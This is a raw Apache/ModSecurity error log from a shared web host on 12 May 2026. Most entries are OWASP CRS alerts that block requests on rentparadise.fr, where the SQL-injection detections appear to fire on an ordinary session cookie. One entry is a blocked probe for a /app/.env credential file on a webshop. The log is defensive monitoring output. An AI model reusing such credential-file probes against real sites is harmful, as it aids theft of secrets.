[Tue May 12 03:58:49.302072 2026] [security2:error] [pid 1709071:tid 1709106] [client 172.104.186.23:46840] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agKJWLvMumyrWMfSu7q-9wAAANM"]
[Tue May 12 03:58:49.862925 2026] [security2:error] [pid 1707624:tid 1707683] [client 172.104.186.23:33592] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778552751||1778552391"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/latest"] [unique_id "agKJWbOxS7i6i_mT2NLf6QAAAEE"]
[Tue May 12 03:58:49.863117 2026] [security2:error] [pid 1707624:tid 1707683] [client 172.104.186.23:33592] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/latest"] [unique_id "agKJWbOxS7i6i_mT2NLf6QAAAEE"]
[Tue May 12 03:58:49.863329 2026] [security2:error] [pid 1707624:tid 1707683] [client 172.104.186.23:33592] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKJWbOxS7i6i_mT2NLf6QAAAEE"]
[Tue May 12 03:59:02.909205 2026] [:error] [pid 1709071:tid 1709096] [client 74.7.243.217:55998] File does not exist: /home/ofcrysta/public_html/exposition_chien.php, referer: http://of-crystal-lake.net/chiens.php?s=u
[Tue May 12 03:59:11.499411 2026] [:error] [pid 1709071:tid 1709092] [client 74.7.243.217:37872] File does not exist: /home/ofcrysta/public_html/exposition_chien.php, referer: http://of-crystal-lake.net/chiens.php?s=m
[Tue May 12 03:59:21.699805 2026] [security2:error] [pid 1707624:tid 1707705] [client 176.65.139.229:53726] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "webshop.totalcloud.fr"] [uri "/app/.env"] [unique_id "agKJebOxS7i6i_mT2NLgGQAAAFc"]
[Tue May 12 03:59:21.700034 2026] [security2:error] [pid 1707624:tid 1707705] [client 176.65.139.229:53726] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "webshop.totalcloud.fr"] [uri "/app/.env"] [unique_id "agKJebOxS7i6i_mT2NLgGQAAAFc"]
[Tue May 12 03:59:22.025443 2026] [security2:error] [pid 1707624:tid 1707705] [client 176.65.139.229:53726] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "webshop.totalcloud.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agKJebOxS7i6i_mT2NLgGQAAAFc"]
[Tue May 12 03:59:24.611572 2026] [:error] [pid 1695975:tid 1695988] [client 74.7.243.217:56364] File does not exist: /home/ofcrysta/public_html/exposition_chien.php, referer: http://of-crystal-lake.net/chiens.php?s=f
[Tue May 12 03:59:27.722165 2026] [security2:error] [pid 1730175:tid 1730193] [client 43.133.220.37:43968] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "castiglionecorporatefinance.com"] [uri "/"] [unique_id "agKJf3o6NvB9WXx5V-6QagAAARA"]
[Tue May 12 03:59:31.596628 2026] [security2:error] [pid 1709071:tid 1709095] [client 43.153.208.49:50676] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKJg7vMumyrWMfSu7q_GgAAAMg"]
[Tue May 12 03:59:36.609116 2026] [security2:error] [pid 1730207:tid 1730213] [client 43.165.7.132:58660] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.labaujue.com"] [uri "/wp-content/uploads/2019/10/carr"] [unique_id "agKJiDue9Sp-pIv_Bb6lKgAAAUQ"]
[Tue May 12 03:59:37.460904 2026] [:error] [pid 1709071:tid 1709106] [client 74.7.243.217:59736] File does not exist: /home/ofcrysta/public_html/exposition_chien.php, referer: http://of-crystal-lake.net/chiens.php?s=u
[Tue May 12 03:59:45.059161 2026] [security2:error] [pid 1709071:tid 1709111] [client 172.104.186.23:45000] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778552751||1778552391"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKJkbvMumyrWMfSu7q_JwAAANg"]
[Tue May 12 03:59:45.059396 2026] [security2:error] [pid 1709071:tid 1709111] [client 172.104.186.23:45000] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKJkbvMumyrWMfSu7q_JwAAANg"]
[Tue May 12 03:59:46.218770 2026] [security2:error] [pid 1709071:tid 1709111] [client 172.104.186.23:45000] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agKJkbvMumyrWMfSu7q_JwAAANg"]
[Tue May 12 03:59:48.583112 2026] [security2:error] [pid 1730207:tid 1730221] [client 172.104.186.23:52964] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778552751||1778552391"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/live"] [unique_id "agKJlDue9Sp-pIv_Bb6lXgAAAUw"]
[Tue May 12 03:59:48.583327 2026] [security2:error] [pid 1730207:tid 1730221] [client 172.104.186.23:52964] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/live"] [unique_id "agKJlDue9Sp-pIv_Bb6lXgAAAUw"]
[Tue May 12 03:59:48.583542 2026] [security2:error] [pid 1730207:tid 1730221] [client 172.104.186.23:52964] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKJlDue9Sp-pIv_Bb6lXgAAAUw"]
[Tue May 12 03:59:48.947173 2026] [security2:error] [pid 1709071:tid 1709111] [client 172.104.186.23:45000] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778552751||1778552391"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKJlLvMumyrWMfSu7q_KAAAANg"]
[Tue May 12 03:59:48.947389 2026] [security2:error] [pid 1709071:tid 1709111] [client 172.104.186.23:45000] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKJlLvMumyrWMfSu7q_KAAAANg"]
[Tue May 12 03:59:49.551514 2026] [security2:error] [pid 1709071:tid 1709111] [client 172.104.186.23:45000] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agKJlLvMumyrWMfSu7q_KAAAANg"]
[Tue May 12 03:59:49.790619 2026] [:error] [pid 1709071:tid 1709088] [client 74.7.243.217:42742] File does not exist: /home/ofcrysta/public_html/exposition_chien.php, referer: http://of-crystal-lake.net/chiens.php?s=m
[Tue May 12 03:59:49.939934 2026] [security2:error] [pid 1730207:tid 1730221] [client 172.104.186.23:52964] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778552751||1778552391"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/next"] [unique_id "agKJlTue9Sp-pIv_Bb6lYgAAAUw"]
[Tue May 12 03:59:49.940122 2026] [security2:error] [pid 1730207:tid 1730221] [client 172.104.186.23:52964] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/next"] [unique_id "agKJlTue9Sp-pIv_Bb6lYgAAAUw"]
[Tue May 12 03:59:49.940332 2026] [security2:error] [pid 1730207:tid 1730221] [client 172.104.186.23:52964] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKJlTue9Sp-pIv_Bb6lYgAAAUw"]
[Tue May 12 03:59:50.156078 2026] [security2:error] [pid 1709071:tid 1709111] [client 172.104.186.23:45000] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778552751||1778552391"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKJlrvMumyrWMfSu7q_KgAAANg"]
[Tue May 12 03:59:50.156295 2026] [security2:error] [pid 1709071:tid 1709111] [client 172.104.186.23:45000] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKJlrvMumyrWMfSu7q_KgAAANg"]
[Tue May 12 03:59:50.738141 2026] [security2:error] [pid 1709071:tid 1709111] [client 172.104.186.23:45000] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agKJlrvMumyrWMfSu7q_KgAAANg"]
[Tue May 12 03:59:51.037588 2026] [security2:error] [pid 1730207:tid 1730221] [client 172.104.186.23:52964] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778552751||1778552391"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/public"] [unique_id "agKJlzue9Sp-pIv_Bb6lZQAAAUw"]
[Tue May 12 03:59:51.037787 2026] [security2:error] [pid 1730207:tid 1730221] [client 172.104.186.23:52964] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/public"] [unique_id "agKJlzue9Sp-pIv_Bb6lZQAAAUw"]
[Tue May 12 03:59:51.037984 2026] [security2:error] [pid 1730207:tid 1730221] [client 172.104.186.23:52964] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKJlzue9Sp-pIv_Bb6lZQAAAUw"]
[Tue May 12 03:59:51.308376 2026] [security2:error] [pid 1709071:tid 1709111] [client 172.104.186.23:45000] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778552751||1778552391"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKJl7vMumyrWMfSu7q_KwAAANg"]
[Tue May 12 03:59:51.308588 2026] [security2:error] [pid 1709071:tid 1709111] [client 172.104.186.23:45000] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKJl7vMumyrWMfSu7q_KwAAANg"]
[Tue May 12 03:59:51.882027 2026] [security2:error] [pid 1709071:tid 1709111] [client 172.104.186.23:45000] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agKJl7vMumyrWMfSu7q_KwAAANg"]
[Tue May 12 03:59:52.126861 2026] [security2:error] [pid 1730207:tid 1730221] [client 172.104.186.23:52964] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778552751||1778552391"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/release"] [unique_id "agKJmDue9Sp-pIv_Bb6lZgAAAUw"]
[Tue May 12 03:59:52.127061 2026] [security2:error] [pid 1730207:tid 1730221] [client 172.104.186.23:52964] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/release"] [unique_id "agKJmDue9Sp-pIv_Bb6lZgAAAUw"]
[Tue May 12 03:59:52.127257 2026] [security2:error] [pid 1730207:tid 1730221] [client 172.104.186.23:52964] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKJmDue9Sp-pIv_Bb6lZgAAAUw"]
[Tue May 12 03:59:52.496579 2026] [security2:error] [pid 1709071:tid 1709111] [client 172.104.186.23:45000] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778552751||1778552391"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKJmLvMumyrWMfSu7q_LAAAANg"]
[Tue May 12 03:59:52.496779 2026] [security2:error] [pid 1709071:tid 1709111] [client 172.104.186.23:45000] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKJmLvMumyrWMfSu7q_LAAAANg"]
